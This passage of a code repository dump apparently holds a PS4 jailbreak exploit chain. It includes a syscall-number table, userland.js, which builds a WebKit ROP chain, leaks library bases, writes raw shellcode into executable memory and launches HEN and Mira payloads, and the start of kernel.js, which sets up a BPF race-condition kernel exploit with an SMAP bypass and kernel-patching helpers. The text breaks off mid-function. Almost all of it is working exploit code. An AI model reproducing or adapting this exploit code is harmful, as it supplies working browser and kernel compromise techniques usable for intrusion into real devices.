263 |   "sys_dynlib_unload_prx": 595,
264 |   "sys_dynlib_do_copy_relocations": 596,
265 |   "sys_dynlib_prepare_dlclose": 597,
266 |   "sys_dynlib_get_proc_param": 598,
267 |   "sys_dynlib_process_needed_and_relocate": 599,
268 |   "sys_sandbox_path": 600,
269 |   "sys_mdbg_service": 601,
270 |   "sys_randomized_path": 602,
271 |   "sys_rdup": 603,
272 |   "sys_dl_get_metadata": 604,
273 |   "sys_workaround8849": 605,
274 |   "sys_is_development_mode": 606,
275 |   "sys_get_self_auth_info": 607,
276 |   "sys_dynlib_get_info_ex": 608,
277 |   "sys_budget_get_ptype": 610,
278 |   "sys_budget_getid": 609,
279 |   "sys_get_paging_stats_of_all_threads": 611,
280 |   "sys_get_proc_type_info": 612,
281 |   "sys_get_resident_count": 613,
282 |   "sys_prepare_to_suspend_process": 614,
283 |   "sys_get_resident_fmem_count": 615,
284 |   "sys_thr_get_name": 616,
285 |   "sys_set_gpo": 617,
286 |   "sys_get_paging_stats_of_all_objects": 618,
287 |   "sys_test_debug_rwmem": 619,
288 |   "sys_free_stack": 620,
289 |   "sys_suspend_system": 621,
290 |   "sys_ipmimgr_call": 622,
291 |   "sys_get_gpo": 623,
292 |   "sys_get_vm_map_timestamp": 624,
293 |   "sys_opmc_set_hw": 625,
294 |   "sys_opmc_get_hw": 626,
295 |   "sys_get_cpu_usage_all": 627,
296 |   "sys_mmap_dmem": 628,
297 |   "sys_physhm_open": 629,
298 |   "sys_physhm_unlink": 630,
299 |   "sys_resume_internal_hdd": 631,
300 |   "sys_thr_suspend_ucontext": 632,
301 |   "sys_thr_resume_ucontext": 633,
302 |   "sys_thr_get_ucontext": 634,
303 |   "sys_thr_set_ucontext": 635,
304 |   "sys_set_timezone_info": 636,
305 |   "sys_set_phys_fmem_limit": 637,
306 |   "sys_utc_to_localtime": 638,
307 |   "sys_localtime_to_utc": 639,
308 |   "sys_set_uevt": 640,
309 |   "sys_get_cpu_usage_proc": 641,
310 |   "sys_get_map_statistics": 642,
311 |   "sys_set_chicken_switches": 643,
312 |   "sys_extend_page_table_pool": 644,
313 |   "sys_645": 645,
314 |   "sys_get_kernel_mem_statistics": 646,
315 |   "sys_get_sdk_compiled_version": 647,
316 |   "sys_app_state_change": 648,
317 |   "sys_dynlib_get_obj_member": 649,
318 |   "sys_budget_get_ptype_of_budget": 650,
319 |   "sys_prepare_to_resume_process": 651,
320 |   "sys_process_terminate": 652,
321 |   "sys_blockpool_open": 653,
322 |   "sys_blockpool_map": 654,
323 |   "sys_blockpool_unmap": 655,
324 |   "sys_dynlib_get_info_for_libdbg": 656,
325 |   "sys_blockpool_batch": 657,
326 |   "sys_fdatasync": 658,
327 |   "sys_dynlib_get_list2": 659,
328 |   "sys_dynlib_get_info2": 660,
329 |   "sys_aio_submit": 661,
330 |   "sys_aio_multi_delete": 662,
331 |   "sys_aio_multi_wait": 663,
332 |   "sys_aio_multi_poll": 664,
333 |   "sys_aio_get_data": 655,
334 |   "sys_aio_multi_cancel": 666,
335 |   "sys_get_bio_usage_all": 667,
336 |   "sys_aio_create": 668,
337 |   "sys_aio_submit_cmd": 669,
338 |   "sys_aio_init": 670,
339 |   "sys_get_page_table_stats": 671,
340 |   "sys_dynlib_get_list_for_libdbg": 672
341 | }
342 | 


--------------------------------------------------------------------------------
/userland.js:
--------------------------------------------------------------------------------
  1 | var p;
  2 | 
  3 | var print = function (x) {
  4 |   document.getElementById("console").innerText += x + "\n";
  5 | }
  6 | var print = function (string) { // like print but html
  7 |   document.getElementById("console").innerHTML += string + "\n";
  8 | }
  9 | 
 10 | var get_jmptgt = function (addr) {
 11 |   var z = p.read4(addr) & 0xFFFF;
 12 |   var y = p.read4(addr.add32(2));
 13 |   if (z != 0x25ff) return 0;
 14 | 
 15 |   return addr.add32(y + 6);
 16 | }
 17 | 
 18 | var gadgetmap_wk = {
 19 |   "ep": [0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3],
 20 |   "pop rsi": [0x5e, 0xc3],
 21 |   "pop rdi": [0x5f, 0xc3],
 22 |   "pop rsp": [0x5c, 0xc3],
 23 |   "pop rax": [0x58, 0xc3],
 24 |   "pop rdx": [0x5a, 0xc3],
 25 |   "pop rcx": [0x59, 0xc3],
 26 |   "pop rsp": [0x5c, 0xc3],
 27 |   "pop rbp": [0x5d, 0xc3],
 28 |   "pop r8": [0x47, 0x58, 0xc3],
 29 |   "pop r9": [0x47, 0x59, 0xc3],
 30 |   "infloop": [0xeb, 0xfe, 0xc3],
 31 |   "ret": [0xc3],
 32 |   "mov [rdi], rsi": [0x48, 0x89, 0x37, 0xc3],
 33 |   "mov [rax], rsi": [0x48, 0x89, 0x30, 0xc3],
 34 |   "mov [rdi], rax": [0x48, 0x89, 0x07, 0xc3],
 35 |   "mov rax, rdi": [0x48, 0x89, 0xf8, 0xc3]
 36 | };
 37 | 
 38 | var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0];
 39 | slowpath_jop.reverse();
 40 | 
 41 | var gadgets;
 42 | window.stage2 = function () {
 43 |   try {
 44 |     window.stage2_();
 45 |   } catch (e) {
 46 |     print(e);
 47 |   }
 48 | }
 49 | 
 50 | gadgetcache = {
 51 |   "ret":                    0x0000003C,
 52 |   "jmp rax":                0x00000082,
 53 |   "ep":                     0x000000AD,
 54 |   "pop rbp":                0x000000B6,
 55 |   "mov [rdi], rax":         0x003ADAEB,
 56 |   "pop r8":                 0x000179C5,
 57 |   "pop rax":                0x000043F5,
 58 |   "mov rax, rdi":           0x000058D0,
 59 |   "mov rax, [rax]":         0x0006C83A,
 60 |   "pop rsi":                0x0008F38A,
 61 |   "pop rdi":                0x00038DBA,
 62 |   "pop rcx":                0x00052E59,
 63 |   "pop rsp":                0x0001E687,
 64 |   "mov [rdi], rsi":         0x00023AC2,
 65 |   "mov [rax], rsi":         0x00256667,
 66 |   "pop rdx":                0x001BE024,
 67 |   "pop r9":                 0x00BB320F,
 68 |   "jop":                    0x000C37D0,
 69 |   "infloop":                0x01545EAA,
 70 | 
 71 |   "add rax, rcx":           0x000156DB,
 72 |   "add rax, rsi":           0x001520C6,
 73 |   "and rax, rsi":           0x01570B9F,
 74 |   "mov rdx, rax":           0x00353B31,
 75 |   "mov rdi, rax":           0x015A412F,
 76 |   "mov rax, rdx":           0x001CEF20,
 77 |   "jmp rdi":                0x00295E7E,
 78 | 
 79 |   // Used for kernel exploit stuff
 80 |   "mov rbp, rsp":           0x000F094A,
 81 |   "mov rax, [rdi]":         0x00046EF9,
 82 |   "add rdi, rax":           0x005557DF,
 83 |   "add rax, rsi":           0x001520C6,
 84 |   "and rax, rsi":           0x01570B9F,
 85 |   "jmp rdi":                0x00295E7E,
 86 | };
 87 | 
 88 | window.stage2_ = function () {
 89 |   p = window.prim;
 90 | 
 91 |   p.leakfunc = function (func) {
 92 |     var fptr_store = p.leakval(func);
 93 |     return (p.read8(fptr_store.add32(0x18))).add32(0x40);
 94 |   }
 95 | 
 96 |   var parseFloatStore = p.leakfunc(parseFloat);
 97 |   var parseFloatPtr = p.read8(parseFloatStore);
 98 |   var webKitBase = p.read8(parseFloatStore);
 99 |   window.webKitBase = webKitBase;
100 | 
101 |   webKitBase.low &= 0xfffff000;
102 |   webKitBase.sub32inplace(0x59c000 - 0x24000);
103 | 
104 |   var o2wk = function (o) {
105 |     return webKitBase.add32(o);
106 |   }
107 | 
108 |   gadgets = {
109 |     "stack_chk_fail": o2wk(0xc8),
110 |     "memset": o2wk(0x228),
111 |     "setjmp": o2wk(0x14f8)
112 |   };
113 | 
114 |   var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));
115 |   libSceLibcInternalBase.low &= 0xfffff000;
116 |   libSceLibcInternalBase.sub32inplace(0x20000);
117 | 
118 |   var libKernelBase = p.read8(get_jmptgt(gadgets.stack_chk_fail));
119 |   window.libKernelBase = libKernelBase;
120 |   libKernelBase.low &= 0xfffff000;
121 |   libKernelBase.sub32inplace(0xd000 + 0x4000);
122 | 
123 |   var o2lk = function (o) {
124 |     return libKernelBase.add32(o);
125 |   }
126 | 
127 |   window.o2lk = o2lk;
128 | 
129 |   var wkview = new Uint8Array(0x1000);
130 |   var wkstr = p.leakval(wkview).add32(0x10);
131 |   var orig_wkview_buf = p.read8(wkstr);
132 | 
133 |   p.write8(wkstr, webKitBase);
134 |   p.write4(wkstr.add32(8), 0x367c000);
135 | 
136 |   var gadgets_to_find = 0;
137 |   var gadgetnames = [];
138 |   for (var gadgetname in gadgetmap_wk) {
139 |     if (gadgetmap_wk.hasOwnProperty(gadgetname)) {
140 |       gadgets_to_find++;
141 |       gadgetnames.push(gadgetname);
142 |       gadgetmap_wk[gadgetname].reverse();
143 |     }
144 |   }
145 | 
146 |   gadgets_to_find++;
147 | 
148 |   var findgadget = function (donecb) {
149 |     if (gadgetcache) {
150 |       gadgets_to_find = 0;
151 |       slowpath_jop = 0;
152 | 
153 |       for (var gadgetname in gadgetcache) {
154 |         if (gadgetcache.hasOwnProperty(gadgetname)) {
155 |           gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);
156 |         }
157 |       }
158 |     } else {
159 |       for (var i = 0; i < wkview.length; i++) {
160 |         if (wkview[i] == 0xc3) {
161 |           for (var nl = 0; nl < gadgetnames.length; nl++) {
162 |             var found = 1;
163 |             if (!gadgetnames[nl]) continue;
164 |             var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];
165 |             for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) {
166 |               if (gadgetbytes[compareidx] != wkview[i - compareidx]) {
167 |                 found = 0;
168 |                 break;
169 |               }
170 |             }
171 |             if (!found) continue;
172 |             gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);
173 |             gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;
174 |             delete gadgetnames[nl];
175 |             gadgets_to_find--;
176 |           }
177 |         } else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) {
178 |           var found = 1;
179 |           for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) {
180 |             if (slowpath_jop[compareidx] != wkview[i - compareidx]) {
181 |               found = 0;
182 |               break;
183 |             }
184 |           }
185 |           if (!found) continue;
186 |           gadgets["jop"] = o2wk(i - slowpath_jop.length + 1);
187 |           gadgetoffs["jop"] = i - slowpath_jop.length + 1;
188 |           gadgets_to_find--;
189 |           slowpath_jop = 0;
190 |         }
191 | 
192 |         if (!gadgets_to_find) break;
193 |       }
194 |     }
195 |     if (!gadgets_to_find && !slowpath_jop) {
196 |       setTimeout(donecb, 50);
197 |     } else {
198 |       print("missing gadgets: ");
199 |       for (var nl in gadgetnames) {
200 |         print(" - " + gadgetnames[nl]);
201 |       }
202 |       if (slowpath_jop) print(" - jop gadget");
203 |     }
204 |   }
205 | 
206 |   findgadget(function () { });
207 |   var hold1;
208 |   var hold2;
209 |   var holdz;
210 |   var holdz1;
211 | 
212 |   while (1) {
213 |     hold1 = { a: 0, b: 0, c: 0, d: 0 };
214 |     hold2 = { a: 0, b: 0, c: 0, d: 0 };
215 |     holdz1 = p.leakval(hold2);
216 |     holdz = p.leakval(hold1);
217 |     if (holdz.low - 0x30 == holdz1.low) break;
218 |   }
219 | 
220 |   var pushframe = [];
221 |   pushframe.length = 0x80;
222 |   var funcbuf;
223 |   var funcbuf32 = new Uint32Array(0x100);
224 |   nogc.push(funcbuf32);
225 | 
226 |   var launch_chain = function (chain) {
227 |     var stackPointer = 0;
228 |     var stackCookie = 0;
229 |     var orig_reenter_rip = 0;
230 | 
231 |     var reenter_help = {
232 |       length: {
233 |         valueOf: function () {
234 |           orig_reenter_rip = p.read8(stackPointer);
235 |           stackCookie = p.read8(stackPointer.add32(8));
236 |           var returnToFrame = stackPointer;
237 | 
238 |           var ocnt = chain.count;
239 |           chain.push_write8(stackPointer, orig_reenter_rip);
240 |           chain.push_write8(stackPointer.add32(8), stackCookie);
241 | 
242 |           if (chain.runtime) returnToFrame = chain.runtime(stackPointer);
243 | 
244 |           chain.push(gadgets["pop rsp"]);
245 |           chain.push(returnToFrame); // -> back to the trap life
246 |           chain.count = ocnt;
247 | 
248 |           p.write8(stackPointer, (gadgets["pop rsp"])); // pop pop
249 |           p.write8(stackPointer.add32(8), chain.stackBase); // rop rop
250 |         }
251 |       }
252 |     };
253 |     
254 |     funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
255 | 
256 |     p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
257 |     p.write8(funcbuf.add32(0x80), gadgets["jop"]);
258 |     p.write8(funcbuf, funcbuf);
259 |     p.write8(parseFloatStore, gadgets["jop"]);
260 |     var orig_hold = p.read8(holdz1);
261 |     var orig_hold48 = p.read8(holdz1.add32(0x48));
262 | 
263 |     p.write8(holdz1, funcbuf.add32(0x50));
264 |     p.write8(holdz1.add32(0x48), funcbuf);
265 |     parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
266 |     p.write8(holdz1, orig_hold);
267 |     p.write8(holdz1.add32(0x48), orig_hold48);
268 | 
269 |     stackPointer = p.read8(funcbuf.add32(0x10));
270 |     rtv = Array.prototype.splice.apply(reenter_help);
271 |     return p.leakval(rtv);
272 |   }
273 | 
274 |   gadgets = gadgets;
275 |   p.loadchain = launch_chain;
276 | 
277 |   function swapkeyval(json) {
278 |     var ret = {};
279 |     for (var key in json) {
280 |       if (json.hasOwnProperty(key)) {
281 |         ret[json[key]] = key;
282 |       }
283 |     }
284 |     return ret;
285 |   }
286 | 
287 |   var kview = new Uint8Array(0x1000);
288 |   var kstr = p.leakval(kview).add32(0x10);
289 |   var orig_kview_buf = p.read8(kstr);
290 | 
291 |   p.write8(kstr, window.libKernelBase);
292 |   p.write4(kstr.add32(8), 0x40000);
293 | 
294 |   var countbytes;
295 |   for (var i = 0; i < 0x40000; i++) {
296 |     if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
297 |       countbytes = i;
298 |       break;
299 |     }
300 |   }
301 |   p.write4(kstr.add32(8), countbytes + 32);
302 | 
303 |   var dview32 = new Uint32Array(1);
304 |   var dview8 = new Uint8Array(dview32.buffer);
305 |   for (var i = 0; i < countbytes; i++) {
306 |     if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
307 |       dview8[0] = kview[i + 3];
308 |       dview8[1] = kview[i + 4];
309 |       dview8[2] = kview[i + 5];
310 |       dview8[3] = kview[i + 6];
311 |       var syscallno = dview32[0];
312 |       window.syscalls[syscallno] = window.libKernelBase.add32(i);
313 |     }
314 |   }
315 | 
316 |   var chain = new window.rop;
317 |   var returnvalue;
318 | 
319 |   p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
320 |     chain.clear();
321 | 
322 |     chain.notimes = this.next_notime;
323 |     this.next_notime = 1;
324 | 
325 |     chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
326 | 
327 |     chain.push(window.gadgets["pop rdi"]);
328 |     chain.push(chain.stackBase.add32(0x3ff8));
329 |     chain.push(window.gadgets["mov [rdi], rax"]);
330 | 
331 |     chain.push(window.gadgets["pop rax"]);
332 |     chain.push(p.leakval(0x41414242));
333 | 
334 |     if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
335 |     returnvalue = p.read8(chain.stackBase.add32(0x3ff8));
336 |   }
337 | 
338 |   p.fcall = function () {
339 |     var rv = p.fcall_.apply(this, arguments);
340 |     return returnvalue;
341 |   }
342 | 
343 |   p.readstr = function (addr) {
344 |     var addr_ = addr.add32(0);
345 |     var rd = p.read4(addr_);
346 |     var buf = "";
347 |     while (rd & 0xFF) {
348 |       buf += String.fromCharCode(rd & 0xFF);
349 |       addr_.add32inplace(1);
350 |       rd = p.read4(addr_);
351 |     }
352 |     return buf;
353 |   }
354 | 
355 |   p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) {
356 |     if (typeof sysc == "string") {
357 |       sysc = window.syscallnames[sysc];
358 |     }
359 |     if (typeof sysc != "number") {
360 |       throw new Error("invalid syscall");
361 |     }
362 | 
363 |     var off = window.syscalls[sysc];
364 |     if (off == undefined) {
365 |       throw new Error("invalid syscall");
366 |     }
367 | 
368 |     return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
369 |   }
370 | 
371 |   p.stringify = function (str) {
372 |     var bufView = new Uint8Array(str.length + 1);
373 |     for (var i = 0; i < str.length; i++) {
374 |       bufView[i] = str.charCodeAt(i) & 0xFF;
375 |     }
376 |     window.nogc.push(bufView);
377 |     return p.read8(p.leakval(bufView).add32(0x10));
378 |   };
379 | 
380 |   p.malloc = function malloc(sz) {
381 |     var backing = new Uint8Array(0x10000 + sz);
382 |     window.nogc.push(backing);
383 |     var ptr = p.read8(p.leakval(backing).add32(0x10));
384 |     ptr.backing = backing;
385 |     return ptr;
386 |   }
387 | 
388 |   p.malloc32 = function malloc32(sz) {
389 |     var backing = new Uint8Array(0x10000 + sz * 4);
390 |     window.nogc.push(backing);
391 |     var ptr = p.read8(p.leakval(backing).add32(0x10));
392 |     ptr.backing = new Uint32Array(backing.buffer);
393 |     return ptr;
394 |   }
395 | 
396 |   // Test if the kernel is already patched
397 |   var test = p.syscall("sys_setuid", 0);
398 | 
399 |   if (test != '0') {
400 |     // Kernel not patched, run kernel exploit
401 |     sc = document.createElement("script");
402 |     sc.src = "kernel.js";
403 |     document.body.appendChild(sc);
404 |   } else {
405 |     // Kernel patched, launch cool stuff
406 | 
407 |     // Check mira status
408 |     var testMira = p.syscall("sys_setlogin", p.stringify("root"))
409 |     if(testMira != '0') {
410 |       alert("We've updated our privacy policy in accordance with GDPR. Your trust is important to us, and we're commited to being transparent exploit developers. Press OK to begin data transfer to NSA.")
411 | 
412 |       var code_addr = new int64(0x26100000, 0x00000009);
413 |       var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
414 | 
415 |       // Load HEN-VTX
416 |       if (buffer == '926100000') {
417 |         writeHomebrewEN(p, code_addr.add32(0x100000));
418 |       }
419 | 
420 |       // Launch HEN-VTX
421 |       p.fcall(code_addr);
422 | 
423 |       // Zero
424 |       for(var i = 0; i < 0x300000; i += 8)
425 |       {
426 |         p.write8(code_addr.add32(i), 0);
427 |       }
428 | 
429 |       // Load Mira
430 |       if (buffer == '926100000') {
431 |         writeMira(p, code_addr.add32(0x100000));
432 |       }
433 | 
434 |       // Launch Mira
435 |       p.fcall(code_addr);
436 | 
437 |       // Test if payloads ran successfully, if not, refresh
438 |       testMira = p.syscall("sys_setlogin", p.stringify("root"))
439 | 
440 |       if(testMira != '0')
441 |       {
442 |         location.reload();
443 |       }
444 | 
445 |       // All done all done!
446 |       allset();
447 |     } else {
448 |       // Load payload launcher
449 |       var code_addr = new int64(0x26100000, 0x00000009);
450 |       var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
451 | 
452 |       if (buffer == '926100000') {
453 |         try {
454 |           var createThread = window.webKitBase.add32(0x779390);
455 |           var shellbuf = p.malloc32(0x1000);
456 | 
457 |           var shcode = [0x31fe8948, 0x3d8b48c0, 0x00003ff4, 0xed0d8b48, 0x4800003f, 0xaaf3f929, 0xe8f78948, 0x00000060, 0x48c3c031, 0x0003c0c7, 0x89490000, 0xc3050fca, 0x06c0c748, 0x49000000, 0x050fca89, 0xc0c748c3, 0x0000001e, 0x0fca8949, 0xc748c305, 0x000061c0, 0xca894900, 0x48c3050f, 0x0068c0c7, 0x89490000, 0xc3050fca, 0x6ac0c748, 0x49000000, 0x050fca89, 0x909090c3, 0x90909090, 0x90909090, 0x90909090, 0xb8555441, 0x00003c23, 0xbed23153, 0x00000001, 0x000002bf, 0xec834800, 0x2404c610, 0x2444c610, 0x44c70201, 0x00000424, 0x89660000, 0xc6022444, 0x00082444, 0x092444c6, 0x2444c600, 0x44c6000a, 0xc6000b24, 0x000c2444, 0x0d2444c6, 0xff78e800, 0x10baffff, 0x41000000, 0x8948c489, 0xe8c789e6, 0xffffff73, 0x00000abe, 0xe7894400, 0xffff73e8, 0x31d231ff, 0xe78944f6, 0xffff40e8, 0x48c589ff, 0x200000b8, 0x00000926, 0xc300c600, 0xebc38948, 0x801f0f0c, 0x00000000, 0x01489848, 0x1000bac3, 0x89480000, 0xe8ef89de, 0xfffffef7, 0xe87fc085, 0xe8e78944, 0xfffffef8, 0xf1e8ef89, 0x48fffffe, 0x200000b8, 0x00000926, 0x48d0ff00, 0x5b10c483, 0xc35c415d, 0xc3c3c3c3];
458 |           
459 |           for (var i = 0; i < shcode.length; i++) {
460 |             shellbuf.backing[i] = shcode[i];
461 |           }
462 | 
463 |           p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
464 |         } catch (e) { alert(e); }
465 |       }
466 | 
467 |       // Launch loader
468 |       p.fcall(createThread, shellbuf, 0, p.stringify("loader"));
469 |       awaitpl();
470 |     }
471 |   }
472 | }
473 | 


--------------------------------------------------------------------------------
/kernel.js:
--------------------------------------------------------------------------------
  1 | function kernExploit() {
  2 |   try {
  3 |     var offsetToWebKit = function (o) {
  4 |       return window.webKitBase.add32(o);
  5 |     }
  6 | 
  7 |     var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  8 |     var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low; 
  9 | 
 10 |     if (fd == (-1 >>> 0)) {
 11 |       throw "Failed to open first bpf device!"
 12 |     }
 13 | 
 14 |     // Write BPF programs
 15 |     var bpf_valid = p.malloc32(0x4000);
 16 |     var bpf_spray = p.malloc32(0x4000);
 17 |     var bpf_valid_u32  = bpf_valid.backing;
 18 | 
 19 |     var bpf_valid_prog = p.malloc(0x40);
 20 |     p.write8(bpf_valid_prog, 0x800 / 8)
 21 |     p.write8(bpf_valid_prog.add32(8), bpf_valid)
 22 | 
 23 |     var bpf_spray_prog = p.malloc(0x40);
 24 |     p.write8(bpf_spray_prog, 0x800 / 8)
 25 |     p.write8(bpf_spray_prog.add32(8), bpf_spray)
 26 | 
 27 |     for (var i = 0; i < 0x400;) {
 28 |       bpf_valid_u32[i++] = 6;
 29 |       bpf_valid_u32[i++] = 0;
 30 |     }
 31 | 
 32 |     var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
 33 | 
 34 |     if(rtv.low != 0) {
 35 |       throw "Failed to open first bpf device!";
 36 |     }
 37 | 
 38 |     // Spawn thread
 39 |     var spawnthread = function (name, chain) {
 40 |       var longjmp = window.webKitBase.add32(0x14e8);
 41 |       var createThread = window.webKitBase.add32(0x779390);
 42 |       var contextp = p.malloc32(0x2000);
 43 |       var contextz = contextp.backing;
 44 |       contextz[0] = 1337;
 45 |       var thread2 = new rop();
 46 |       thread2.push(window.gadgets["ret"]);
 47 |       thread2.push(window.gadgets["ret"]);
 48 |       thread2.push(window.gadgets["ret"]);
 49 |       thread2.push(window.gadgets["ret"]);
 50 |       chain(thread2);
 51 |       p.write8(contextp, window.gadgets["ret"]);
 52 |       p.write8(contextp.add32(0x10), thread2.stackBase);
 53 |       p.syscall(324, 1);
 54 |       var retv = function () { p.fcall(createThread, longjmp, contextp, p.stringify(name)); }
 55 |       window.nogc.push(contextp);
 56 |       window.nogc.push(thread2);
 57 |       return retv;
 58 |     }
 59 | 
 60 |     var interrupt1, loop1;
 61 |     var interrupt2, loop2;
 62 |     var sock = p.syscall(97, 2, 2);
 63 |     var kscratch = p.malloc32(0x1000);
 64 | 
 65 |     // Racing thread
 66 |     var start1 = spawnthread("GottaGoFast", function (thread2) {
 67 |       interrupt1 = thread2.stackBase;
 68 |       thread2.push(window.gadgets["ret"]);
 69 |       thread2.push(window.gadgets["ret"]);
 70 |       thread2.push(window.gadgets["ret"]);
 71 | 
 72 |       thread2.push(window.gadgets["pop rdi"]);
 73 |       thread2.push(fd);
 74 |       thread2.push(window.gadgets["pop rsi"]);
 75 |       thread2.push(0x8010427B);
 76 |       thread2.push(window.gadgets["pop rdx"]);
 77 |       thread2.push(bpf_valid_prog);
 78 |       thread2.push(window.gadgets["pop rsp"]);
 79 |       thread2.push(thread2.stackBase.add32(0x800));
 80 |       thread2.count = 0x100;
 81 |       var cntr = thread2.count;
 82 |       thread2.push(window.syscalls[54]); // ioctl
 83 |       thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
 84 | 
 85 |       thread2.push(window.gadgets["pop rdi"]);
 86 |       var wherep = thread2.pushSymbolic();
 87 |       thread2.push(window.gadgets["pop rsi"]);
 88 |       var whatp = thread2.pushSymbolic();
 89 |       thread2.push(window.gadgets["mov [rdi], rsi"]);
 90 | 
 91 |       thread2.push(window.gadgets["pop rsp"]);
 92 | 
 93 |       loop1 = thread2.stackBase.add32(thread2.count * 8);
 94 |       thread2.push(0x41414141);
 95 | 
 96 |       thread2.finalizeSymbolic(wherep, loop1);
 97 |       thread2.finalizeSymbolic(whatp, loop1.sub32(8));
 98 |     });
 99 | 
100 |     // start setting up chains
101 |     var krop = new rop();
102 |     var race = new rop();
103 | 
104 |     /**
105 |       * Qwerty Madness!
106 |       * -
107 |       * This section contains magic. It's for bypassing Sony's ghetto "SMAP".
108 |       * Need to be a level 99 mage to understand this completely (not really but kinda). ~ Specter
109 |      **/
110 | 
111 |     var ctxp  = p.malloc32(0x2000);
112 |     var ctxp1 = p.malloc32(0x2000);
113 |     var ctxp2 = p.malloc32(0x2000);
114 | 
115 |     p.write8(bpf_spray.add32(16), ctxp);
116 |     p.write8(ctxp.add32(0x50), 0);
117 |     p.write8(ctxp.add32(0x68), ctxp1);
118 |     var stackshift_from_retaddr = 0;
119 |     p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // sub rsp
120 | 
121 |     stackshift_from_retaddr += 8 + 0x58;
122 | 
123 |     p.write8(ctxp.add32(0), ctxp2);
124 |     p.write8(ctxp.add32(0x10), ctxp2.add32(8));
125 |     p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
126 | 
127 |     var iterbase = ctxp2;
128 | 
129 |     for (var i = 0; i < 0xf; i++) {
130 |       p.write8(iterbase, offsetToWebKit(0x12A19CD)); // sub rsp
131 |       stackshift_from_retaddr += 8 + 0x58;
132 |       p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
133 |       p.write8(iterbase.add32(8), iterbase.add32(0x20));
134 |       p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
135 |       iterbase = iterbase.add32(0x20);
136 |     }
137 | 
138 |     var raxbase = iterbase;
139 |     var rdibase = iterbase.add32(8);
140 |     var memcpy = get_jmptgt(webKitBase.add32(0xF8));
141 |     memcpy = p.read8(memcpy);
142 | 
143 |     p.write8(raxbase, offsetToWebKit(0x15CA41B));
144 |     stackshift_from_retaddr += 8;
145 | 
146 |     p.write8(rdibase.add32(0x70), offsetToWebKit(0x1284834));
147 |     stackshift_from_retaddr += 8;
148 | 
149 |     p.write8(rdibase.add32(0x18), rdibase);
150 |     p.write8(rdibase.add32(8), krop.stackBase);
151 |     p.write8(raxbase.add32(0x30), window.gadgets["mov rbp, rsp"]);
152 |     p.write8(rdibase, raxbase);
153 |     p.write8(raxbase.add32(0x420), offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
154 |     p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90));
155 |     var topofchain = stackshift_from_retaddr + 0x28;
156 |     p.write8(rdibase.add32(0xB0), topofchain);
157 | 
158 |     for (var i = 0; i < 0x1000 / 8; i++) {
159 |       p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
160 |     }
161 | 
162 |     krop.count = 0x10;
163 | 
164 |     /**
165 |       * End of Qwerty madness
166 |      **/
167 | 
168 |     /**
169 |       * Bit of info:
170 |       * -
171 |       * The "kchain" buffer is used to store the kernel ROP chain, and is managed by the "krop" class defined in rop.js.
172 |       * There are also two helper functions for the class, "kpatch" and "kpatch2" for patching the kernel defined below.
173 |       * The "kchainstack" buffer should not be used directly as it is managed by the "krop" class!
174 |       * -
175 |       * The "kscratch" buffer is used to save context. The layout is as follows:
176 |       * kscratch + 0x00: contents of rax register (points to kernel base + 0x16DB6C)
177 |       * kscratch + 0x08: pointer to function stub that manipulates cr0 (mov rax, cr0; or rax, 5002Ah; mov cr0, rax; ret)
178 |       * kscratch + 0x10: contents of cr0 before the write protection bit is flipped for kernel patching
179 |       * kscratch + 0x18: pointer to kscratch
180 |       * kscratch + 0x40: "pop rax" gadget
181 |       * kscratch + 0x420: "pop rdi" gadget
182 |      **/
183 | 
184 |     // Helper function for patching kernel
185 |     var kpatch = function(offset, qword) {
186 |       krop.push(window.gadgets["pop rax"]);
187 |       krop.push(kscratch);
188 |       krop.push(window.gadgets["mov rax, [rax]"]);
189 |       krop.push(window.gadgets["pop rsi"]);
190 |       krop.push(offset);
191 |       krop.push(window.gadgets["add rax, rsi"]);
192 |       krop.push(window.gadgets["pop rsi"]);
193 |       krop.push(qword);
194 |       krop.push(window.gadgets["mov [rax], rsi"]);
195 |     }
196 | 
197 |     // Helper function for patching kernel with information from kernel.text
198 |     var kpatch2 = function(offset, offset2) {
199 |       krop.push(window.gadgets["pop rax"]);
200 |       krop.push(kscratch);
